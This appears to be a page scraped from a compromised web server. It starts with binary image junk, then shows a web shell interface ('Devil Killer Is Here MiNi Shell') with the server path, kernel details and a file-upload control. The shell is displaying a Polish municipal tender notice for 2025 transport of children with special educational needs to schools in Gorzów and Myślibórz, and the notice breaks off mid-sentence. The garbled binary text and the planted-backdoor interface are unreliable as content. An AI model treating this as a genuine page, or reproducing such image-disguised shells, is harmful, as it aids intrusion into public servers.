JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241107/0058254501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewóz dzieci i młodzieży z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie Gorzowa Wlkp. oraz Myśliborza w 2025r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LUBISZYN</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Lubiszyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210966817</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac Jedności Robotniczej 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubiszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-433</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 727 71 30</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">95 727 71 36</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@lubiszyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lubiszyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewóz dzieci i młodzieży z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie Gorzowa Wlkp. oraz Myśliborza w 2025r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9f7c6826-523e-4814-8648-b7ce5e41ac1f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00582545</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025011/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Przewóz dzieci i młodzieży szkolnej z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie Gorzowa Wlkp. i Myśliborza w 2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://lubiszyn.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://lubiszyn.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://lubiszyn.logintrade.net/rejestracja/przetargi.html zwanej dalej Platformą. <br/>2. Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcjami korzystania z Platformy zakupowej. Instrukcja zamieszona jest na ww. Platformie.<br/>3. Specyfikację połączenia oraz niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie tj.:<br/>a) Dopuszczalne przeglądarki internetowe:<br/>-Edge<br/>-Google Chrome<br/>-Mozilla Firefox<br/>-Opera;<br/>b) Pozostałe wymagania techniczne:<br/>-dostęp do sieci internet<br/>-obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax<br/>-włączona obsługa JavaScript<br/>-zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>-zainstalowany Acrobat Reader<br/>-zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>4. Zamawiający wskazuje dopuszczalne formaty przesyłanych plików, w szczególności: JPG .js .tif .dwg .dfx .ods .odt .pdf .xls .txt .doc .ico .bmp .zip .gif .jpg .png .css .php .htm .jpeg. <br/>5. Informacje na temat kodowania i czasu odbioru danych, tj.: plik załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w Systemie, jako zaszyfrowany. Możliwość otwarcia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/><br/>6.	Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych <br/>z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego tel. +48 71 787-37-57 lub 71 787-35-34; pn-pt, 8.00-16.00 e-mail: helpdesk@logintrade.net.<br/>7.	Korespondencja kierowana do Zamawiającego powinna być opatrzona numerem postępowania, tj. RIT.271.4.10.2024<br/>8.	Korzystanie z Platformy jest bezpłatne a informacje o wymaganiach technicznych <br/>i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej są dostępne na Platformie.<br/>9.	Wszelką korespondencję związaną z niniejszym postępowaniem, należy przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie <br/>o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie <br/>z przepisami krajowymi.<br/>2. Administratorem danych osobowych jest Gmina Lubiszyn z siedzibą Lubiszynie pod adresem: Plac Jedności Robotniczej 1 66-433 Lubiszyn tel. 095 727 71 30<br/>3. Kontakt z inspektorem ochrony danych osobowych możliwy jest pod adresem: inspektor@cbi24.pl<br/>4. Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.<br/>5. Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. Przewóz dzieci i młodzieży szkolnej z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie Miasta Gorzowa Wlkp. oraz Myśliborza w okresie od 2 stycznia do 31 grudnia 2025r. <br/>6. Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej. <br/>7. Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>8. Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w pkt 2 powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w pkt 2 powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>9. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO <br/>i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>-	obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego;<br/>-	obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego.<br/>10. W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w załączniku Formularzu ofertowym.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że:<br/>-	Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>-	Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia.<br/>-	W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych <br/>z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym <br/>o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych <br/>z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>-	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa <br/>w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>-	W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>-	W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania <br/>o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIT.271.4.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonywanie usług specjalistycznego transportu osobowego<br/>w zakresie dowozu i opieki (w czasie dowozu) uczniów posiadających orzeczenie o potrzebie kształcenia specjalnego oraz niepełnosprawnych zamieszkałych na terenie gminy Lubiszyn do przedszkoli, szkół podstawowych, ponadpodstawowych lub innych placówek oświatowych wymienionych w art. 2 pkt 7 ustawy z dnia 14 grudnia 2016 r. Prawo oświatowe (t.j. Dz.U.2024, poz. 737).<br/>Przewóz dzieci i młodzieży szkolnej z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie Miasta <br/>Gorzowa Wlkp. oraz Myśliborza odbywać się będzie w okresie od 2 stycznia do 31 grudnia 2025 wraz z zabezpieczeniem opiekunów, tj.<br/><br/><br/><br/>Zadanie I - „Przewóz dzieci i młodzieży szkolnej z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do placówek oświatowych zlokalizowanych na terenie miasta Gorzowa Wielkopolskiego w okresie od 02 stycznia 2025r. do 31 grudnia 2025r. wraz z zabezpieczeniem opiekuna”.<br/><br/>Zadanie II - „Przewóz dzieci i młodzieży szkolnej z orzeczeniami o potrzebie kształcenia specjalnego oraz niepełnosprawnych do Ośrodka Szkolno-Wychowawczego TPD <br/>w Myśliborzu, ul. Spokojna 22 w okresie od 02 stycznia 2025r.do o 31 grudnia 2025r. wraz <br/>z zabezpieczeniem opiekuna”.<br/><br/>Przedmiot zamówienia obejmuje transport z miejsca zamieszkania uczniów do przedszkoli, szkół podstawowych, ponadpodstawowych lub innych placówek oświatowych oraz powrót <br/>z ww. placówek do miejsca zamieszkania uczniów, a także zapewnienia opieki w czasie transportu.<br/>Wykonawca zobowiązany jest do zatrudnienia osób wykonujących czynności dotyczące przewożenia uczniów i opieki nad nimi, przez cały okres realizacji umowy, na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974r. Kodeks pracy (t.j. Dz.U. 2023 poz. 1465 ze zm.). <br/>Dla udokumentowania tego faktu Wykonawca przedstawi na każde pisemne wezwanie zamawiającego, oświadczenie lub dokumenty potwierdzające spełnienie powyższego warunku.<br/>Zamawiający zastrzega sobie prawo do nadzoru nad realizacją zamówienia, <br/>w szczególności do:<br/>	żądania do wglądu dokumentów potwierdzających sprawność pojazdów samochodowych oraz dowodów rejestracyjnych pojazdów,<br/>	żądania do wglądu dokumentów kierowców i opiekunów potwierdzających kwalifikacje do wykonania przedmiotu zamówienia,<br/>	kontrolowania punktualności i terminowości wykonywanej usługi, na podstawie zatwierdzonego harmonogramu dowozu uczniów.<br/><br/>Przewidywana ilość kilometrów wykonywanej usługi służąca do porównania ofert.<br/>Zadanie 1 Poniedziałek - Piątek 95,8 km dziennie (47,9 km dowóz i 47,9 km odwóz) <br/> 4 tygodnie x 479 km = 1916 km / miesiąc x 10 miesięcy = 19 160 km<br/> <br/>Zadanie 2 Poniedziałek - 26,5 km dziennie (17,6 km dowóz i 8,9 km odwóz) <br/> Wtorek - Czwartek - 17,8 km dziennie (8,9 km dowóz i 8,9 km odwóz)<br/> Piątek - 26,5 km dziennie (8,9 km dowóz i 17,6 km odwóz)<br/> 4 tygodnie x 106,4 km = 425,60 km /miesiąc x 10 miesięcy = 4 256 km<br/><br/>Razem przybliżony zakres usługi to około: <br/>Zadanie 1 - 19 160 km<br/>Zadanie 2 - 4 256 km.<br/><br/>Wskazane powyżej kilometraże są wielkościami szacunkowymi w oparciu o dotychczasowe doświadczenie Zamawiającego i służą jedynie ustaleniu przez Wykonawcę cen. Liczba przejechanych kilometrów w ciągu trwania roku szkolnego/otwarcia placówki może ulec zmniejszeniu lub zwiększeniu, co pociąga za sobą zmniejszenie lub zwiększenie wynagrodzenia na zasadach określonych w projekcie umowy. Wysokość wynagrodzenia, będzie wartością kosztorysową rozliczaną miesięcznie na podstawie załączonego do faktury dokumentu (wykazu) faktycznie przejechanych kilometrów.<br/>W kalkulacji ceny 1 km należy uwzględnić wszystkie obowiązki Wykonawcy i koszty, które będzie musiał ponieść w celu kompleksowego wykonania zamówienia w okresie jego realizacji. Cena obejmuje m.in. zatrudnienie osób (kierowcy, opiekun dla dzieci), koszty paliwa, amortyzacji sprzętu, ubezpieczenie, inne opłaty niezbędne dla prawidłowego wykonania zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium jakościowe- wiek pojazdów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z udziału w postępowaniu oraz spełniają warunki udziału w postępowaniu określone przez Zamawiającego wskazanie poniżej.<br/>W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>1/ Wykonawca spełni ww. warunek, jeśli wykaże, że posiada licencję na wykonywanie transportu drogowego osób udzieloną przez starostę właściwego dla siedziby Wykonawcy, zgodnie z ustawą z dnia 06 września 2001r. o transporcie drogowym (t.j. Dz.U. 2024, poz. 1251) lub analogiczny ważny dokument na podstawie przepisów wcześniejszych. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (jeżeli dotyczy), spełnią ten warunek, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje świadczenie, do którego realizacji te uprawnienia są wymagane.<br/><br/> W zakresie posiadania zdolności technicznej lub 